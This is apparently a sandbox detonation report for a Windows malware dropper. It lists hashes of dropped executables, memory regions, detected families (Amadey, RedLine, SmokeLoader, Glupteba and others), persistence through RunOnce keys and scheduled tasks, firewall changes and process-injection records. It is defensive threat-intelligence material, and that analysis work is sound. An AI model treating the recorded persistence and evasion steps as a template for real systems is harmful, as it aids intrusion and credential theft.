SHA256 f20db299a4c88ad396ae6b9a343d687b0104857c136482de885c55ed5c95932d
SHA512 ec1724be301cb6932130c064429ea976e1cc69f571c6505df201ee7d705d5f5e98c5a2cd3f00e4c5e98bb5511021defd5ba263b5293e53a2b798ca245b6d3586

memory/2784-26-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2784-25-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2784-24-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2784-23-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2784-27-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1260-32-0x0000000002A60000-0x0000000002A76000-memory.dmp

memory/2784-33-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AB2D.exe

MD5 9167b48ab2ba8a8b32efb314545a0c4d
SHA1 6ecc8d67078301a9d03c839bad82057e48a88794
SHA256 bbc268b7e554713d2286552b2eb9b4cd29dc380717e198762b1ed494fc830b42
SHA512 8ff5e130702d811aecf44e735e86ce68be552872674519c16be66c9f45731fc8cfa2fd76c602fa30fdf1223b71ea1aef3cc74d42978d4accf319a4da4a3bba2f

\Users\Admin\AppData\Local\Temp\AB2D.exe

MD5 9167b48ab2ba8a8b32efb314545a0c4d
SHA1 6ecc8d67078301a9d03c839bad82057e48a88794
SHA256 bbc268b7e554713d2286552b2eb9b4cd29dc380717e198762b1ed494fc830b42
SHA512 8ff5e130702d811aecf44e735e86ce68be552872674519c16be66c9f45731fc8cfa2fd76c602fa30fdf1223b71ea1aef3cc74d42978d4accf319a4da4a3bba2f

\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe

MD5 81e8f0effa6ab8d26f586b5ed527bcc3
SHA1 0d71e7435ea5e07ca6022670f8d4ac89279d78f7
SHA256 16de307fbc88d27d5d0628012ecae780064c0f38114ca7974fb71d7b06992ba9
SHA512 4218da913ddf63102651ec1a463a6e44ac48270fc9eb6f2a7d5cb6408ddf996a752291dddaa8c9cc4ee4ee1a404d38f7d50d75472fe04124102231584f62dfa6

C:\Users\Admin\AppData\Local\Temp\B32A.exe

MD5 9a1b518f0106f548fe96669110cbd4e6
SHA1 0577e85cbd4081fbd54d208063b7882606254a31
SHA256 aed0f7cc60856257bb38f56455421b5e9a7fab79878c7ecac38156a81339fd0d
SHA512 c72771204fcc7fc8d5d217451e9d092e141df1aa7080b6c1b56aebac0a199396d9b51a30569bdadbd93806bae34b5c13a7aed169d3c4d97659824545b82466f6

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Il6Jj0CT.exe

MD5 81e8f0effa6ab8d26f586b5ed527bcc3
SHA1 0d71e7435ea5e07ca6022670f8d4ac89279d78f7
SHA256 16de307fbc88d27d5d0628012ecae780064c0f38114ca7974fb71d7b06992ba9
SHA512 4218da913ddf63102651ec1a463a6e44ac48270fc9eb6f2a7d5cb6408ddf996a752291dddaa8c9cc4ee4ee1a404d38f7d50d75472fe04124102231584f62dfa6

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe

MD5 6260ea09b699206fc0fdb8df9d9e8d14
SHA1 62040a73935167459b5979bae2471b709763efa0
SHA256 bbe0e5fdd48f70a4aa2437ad27c59ca15c3fd3396ecffa70dda3a8e32a983195
SHA512 0957b6ea1fc42111af74a4c059213993250cfea76c4d819d8d6a177b6457e945be51efc28175ffd889bdd72eed4c618c8c0c6bb88751e7b56757897d50bfb55e

\Users\Admin\AppData\Local\Temp\IXP003.TMP\nn9Ie4tJ.exe

MD5 6260ea09b699206fc0fdb8df9d9e8d14
SHA1 62040a73935167459b5979bae2471b709763efa0
SHA256 bbe0e5fdd48f70a4aa2437ad27c59ca15c3fd3396ecffa70dda3a8e32a983195
SHA512 0957b6ea1fc42111af74a4c059213993250cfea76c4d819d8d6a177b6457e945be51efc28175ffd889bdd72eed4c618c8c0c6bb88751e7b56757897d50bfb55e

\Users\Admin\AppData\Local\Temp\IXP004.TMP\Bf8HN4LX.exe

MD5 29dc12eac39f0bdbea57e7f7d0f5f4f8
SHA1 5274a3620d5302f327f7c2c72030a5281f84b8ae
SHA256 51a28d49ee525cfb28e97a96355de48e002225f99b278624432f20572d327903
SHA512 93cfc5f423614dcdfeff73ccb1da3c10b5fd648d44422d4171a7303d500fa13b9ad3642a58bc0d23f0fc5fda4f252a56962466fb090a2f20e7f4675cdcf283f5

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Bf8HN4LX.exe

MD5 29dc12eac39f0bdbea57e7f7d0f5f4f8
SHA1 5274a3620d5302f327f7c2c72030a5281f84b8ae
SHA256 51a28d49ee525cfb28e97a96355de48e002225f99b278624432f20572d327903
SHA512 93cfc5f423614dcdfeff73ccb1da3c10b5fd648d44422d4171a7303d500fa13b9ad3642a58bc0d23f0fc5fda4f252a56962466fb090a2f20e7f4675cdcf283f5

\Users\Admin\AppData\Local\Temp\IXP005.TMP\Sn1qc8gI.exe

MD5 f75c658600de8ee2742b07ce9fcc1f79
SHA1 064adc5e6f575d2d06b92f2000f074435eb6e9ef
SHA256 786d523d39285b9614a94daa59241c0f0a1fc7f451a007800a584c2b330853fb
SHA512 e3e4b264c3056aa2c681d204b788173faf6b3716427876306e84784e75c6e6b17503a720db2ba7a5c13df97ac97ebf131c297532311d9a7446da2574f01d4762

C:\Users\Admin\AppData\Local\Temp\B675.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Sn1qc8gI.exe

MD5 f75c658600de8ee2742b07ce9fcc1f79
SHA1 064adc5e6f575d2d06b92f2000f074435eb6e9ef
SHA256 786d523d39285b9614a94daa59241c0f0a1fc7f451a007800a584c2b330853fb
SHA512 e3e4b264c3056aa2c681d204b788173faf6b3716427876306e84784e75c6e6b17503a720db2ba7a5c13df97ac97ebf131c297532311d9a7446da2574f01d4762

\Users\Admin\AppData\Local\Temp\B32A.exe

MD5 9a1b518f0106f548fe96669110cbd4e6
SHA1 0577e85cbd4081fbd54d208063b7882606254a31
SHA256 aed0f7cc60856257bb38f56455421b5e9a7fab79878c7ecac38156a81339fd0d
SHA512 c72771204fcc7fc8d5d217451e9d092e141df1aa7080b6c1b56aebac0a199396d9b51a30569bdadbd93806bae34b5c13a7aed169d3c4d97659824545b82466f6

\Users\Admin\AppData\Local\Temp\IXP006.TMP\1Nd72JG2.exe

MD5 da0eee39485725d0adaa5678f4d1b681
SHA1 1bd7d3989821d2c92f40a682d6d08a567f5e6da2
SHA256 497b29333dcded5d2521b809843febe11b43ee3b6d74588210084deb27a70e70
SHA512 a316344340632f4c1391e912e97b747ca648ca3171b259ae24730c68db4d325eafb8eb0c1c8470c058a68099cbc5b702185b738d23a67aa1206484489179eba4

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1Nd72JG2.exe

MD5 da0eee39485725d0adaa5678f4d1b681
SHA1 1bd7d3989821d2c92f40a682d6d08a567f5e6da2
SHA256 497b29333dcded5d2521b809843febe11b43ee3b6d74588210084deb27a70e70
SHA512 a316344340632f4c1391e912e97b747ca648ca3171b259ae24730c68db4d325eafb8eb0c1c8470c058a68099cbc5b702185b738d23a67aa1206484489179eba4

C:\Users\Admin\AppData\Local\Temp\B6C1.tmp\B6C2.tmp\B6C3.bat

MD5 0ec04fde104330459c151848382806e8
SHA1 3b0b78d467f2db035a03e378f7b3a3823fa3d156
SHA256 1ee0a6f7c4006a36891e2fd72a0257e89fd79ad811987c0e17f847fe99ea695f
SHA512 8b928989f17f09282e008da27e8b7fd373c99d5cafb85b5f623e02dbb6273f0ed76a9fbbfef0b080dbba53b6de8ee491ea379a38e5b6ca0763b11dd4de544b40

C:\Users\Admin\AppData\Local\Temp\B992.exe

MD5 2fef31cdda5719e13df06a8c4a2c6fd5
SHA1 8b85b809145d88dc9d20a42d372cfd8a6638cb0a
SHA256 6e9476e26e20d6d2278a3318e6378a12c5a17cd10b18527433c0fecd2e0f9693
SHA512 5e6ad8edab707f2b7b0b3b252490ee376d3da8364528c03752a04633c060eb514d25d00885568c9bd31c83021d5a9191ba9a7277c29abfc8781560a3838f0e3c

\Users\Admin\AppData\Local\Temp\B992.exe

MD5 2fef31cdda5719e13df06a8c4a2c6fd5
SHA1 8b85b809145d88dc9d20a42d372cfd8a6638cb0a
SHA256 6e9476e26e20d6d2278a3318e6378a12c5a17cd10b18527433c0fecd2e0f9693
SHA512 5e6ad8edab707f2b7b0b3b252490ee376d3da8364528c03752a04633c060eb514d25d00885568c9bd31c83021d5a9191ba9a7277c29abfc8781560a3838f0e3c

C:\Users\Admin\AppData\Local\Temp\BD3B.exe

MD5 57543bf9a439bf01773d3d508a221fda
SHA1 5728a0b9f1856aa5183d15ba00774428be720c35
SHA256 70d2e4df54793d08b8e76f1bb1db26721e0398da94dca629ab77bd41cc27fd4e
SHA512 28f2eb1fef817df513568831ca550564d490f7bd6c46ada8e06b2cd81bbc59bc2d7b9f955dbfc31c6a41237d0d0f8aa40aaac7ae2fabf9902228f6b669b7fe20

C:\Users\Admin\AppData\Local\Temp\BE45.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

memory/1000-174-0x0000000000B90000-0x0000000000B9A000-memory.dmp

memory/1000-177-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EAF1.exe

MD5 1f353056dfcf60d0c62d87b84f0a5e3f
SHA1 c71a24f90d3ca5a4e26ad8c58db1fc078a75a8f0
SHA256 f30654f4b2b72d4143616a3c2bb3b94b78a9726868b3dfa302ba36892e889d0e
SHA512 84b13853a888d1c7fb7ffbe0885fc7fe66237e46234ee0b95ba4fc31c14d94e8f7c7506d42fa70aab1b2c4aa744bd8043048c0e6ae75dd31da7c3089b0c0599d

C:\Users\Admin\AppData\Local\Temp\AE1.exe

MD5 21b738f4b6e53e6d210996fa6ba6cc69
SHA1 3421aceeaa8f9f53169ae8af4f50f0d9d2c03f41
SHA256 3b1af64f9747985b3b79a7ce39c6625b43e562227dc2f96758118b2acb3e5e58
SHA512 f766a972fde598399091a82fc8db8d9edd25a9a5f9e5a0568769632091605eeb47bf3b44b69d37d51c1c7ab8be89cd4fb4846a5f06d719db885a35e049f1eb81

memory/2792-204-0x0000000000270000-0x00000000002CA000-memory.dmp

memory/2792-205-0x0000000000400000-0x000000000046F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\260F.exe

MD5 109da216e61cf349221bd2455d2170d4
SHA1 ea6983b8581b8bb57e47c8492783256313c19480
SHA256 a94bec1ee46f4a7e50fbccb77c8604c8c32b78a4879d18f923b5fa5e8e80d400
SHA512 460d710c0ffbe612ce5b07ae74abf360ebcf9e88993f2fc4448f31b96005f76f6902453c023477438b676f62de93e1c3e9ba980836c12dc5fc617728a9346e26

memory/2976-220-0x0000000000020000-0x000000000003E000-memory.dmp

memory/1000-222-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

memory/2976-224-0x0000000000400000-0x0000000000431000-memory.dmp

memory/2464-228-0x0000000000CA0000-0x0000000001BCA000-memory.dmp

memory/2720-233-0x0000000000090000-0x00000000000AE000-memory.dmp

memory/2464-237-0x0000000070B80000-0x000000007126E000-memory.dmp

memory/2792-239-0x0000000070B80000-0x000000007126E000-memory.dmp

memory/2720-240-0x0000000070B80000-0x000000007126E000-memory.dmp

memory/2792-242-0x0000000006F20000-0x0000000006F60000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

memory/1996-270-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1996-274-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1436-275-0x0000000002444000-0x0000000002457000-memory.dmp

memory/1436-276-0x0000000000220000-0x0000000000229000-memory.dmp

memory/1092-277-0x0000000004080000-0x0000000004478000-memory.dmp

memory/3056-278-0x0000000000190000-0x00000000006A6000-memory.dmp

memory/1996-282-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1260-281-0x0000000003A00000-0x0000000003A16000-memory.dmp

memory/2464-287-0x0000000070B80000-0x000000007126E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D205WY6X\favicon[1].ico

MD5 f3418a443e7d841097c714d69ec4bcb8
SHA1 49263695f6b0cdd72f45cf1b775e660fdc36c606
SHA256 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
SHA512 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

memory/1000-328-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabA3A0.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\TarA3C2.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 479ee68e2f5341d941083309f4933d29
SHA1 785ca217c981d82e93ef59be81c798a751499c2a
SHA256 579ccc093a995461c37ad1ab946ea5002b8a9a786cb1fcdf46cc323a7c0b5583
SHA512 3da41825784166bd73730c109a182f287a9d6622c74088b1f8ed524806ac3582bbdc2553368d0812936d919e1d784a6a12c2c212c17d867653c508fe8eda270e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a38bfb8461b9f37cd80b726425340408
SHA1 d7282921428ef76fc1cbfd58afb08456007f90c8
SHA256 ffc999d464b6fc224c9b31747798f15c5b858f79f22d5c453a75fca41f1ff5be
SHA512 576266d202c90ec3b3377d05c77a82ddaf0b0357e0aff58483674a8224c7f06309dcc4dbf53938089f66ea7c387af07daf37136fb78ee86c7fbabded60ab9ca0

C:\Users\Admin\AppData\Local\Temp\tmpBAE7.tmp

C:\Users\Admin\AppData\Local\Temp\tmpBAD1.tmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3V0T767YOKO9ZX48K1SO.temp


Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 20:48

Reported

2023-10-10 21:20

Platform

win10v2004-20230915-en

Max time kernel

24s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

Detect Mystic stealer payload

Detects Healer an antivirus disabler dropper

Glupteba

loader dropper glupteba

Glupteba payload

Healer

dropper healer

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

SectopRAT

trojan rat sectoprat

SectopRAT payload

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe N/A

Legitimate hosting services abused for malware hosting/C2

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3664 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe
PID 3664 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe
PID 3664 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe
PID 3872 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe
PID 3872 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe
PID 3872 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe
PID 2812 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2812 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2812 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2812 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2812 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2812 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3872 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe
PID 3872 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe
PID 3872 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3664 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4977465.exe
PID 3664 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4977465.exe
PID 3664 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4977465.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2812 -ip 2812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 148

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3236 -ip 3236

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 152

C:\Windows\SysWOW64\WerFault.exe

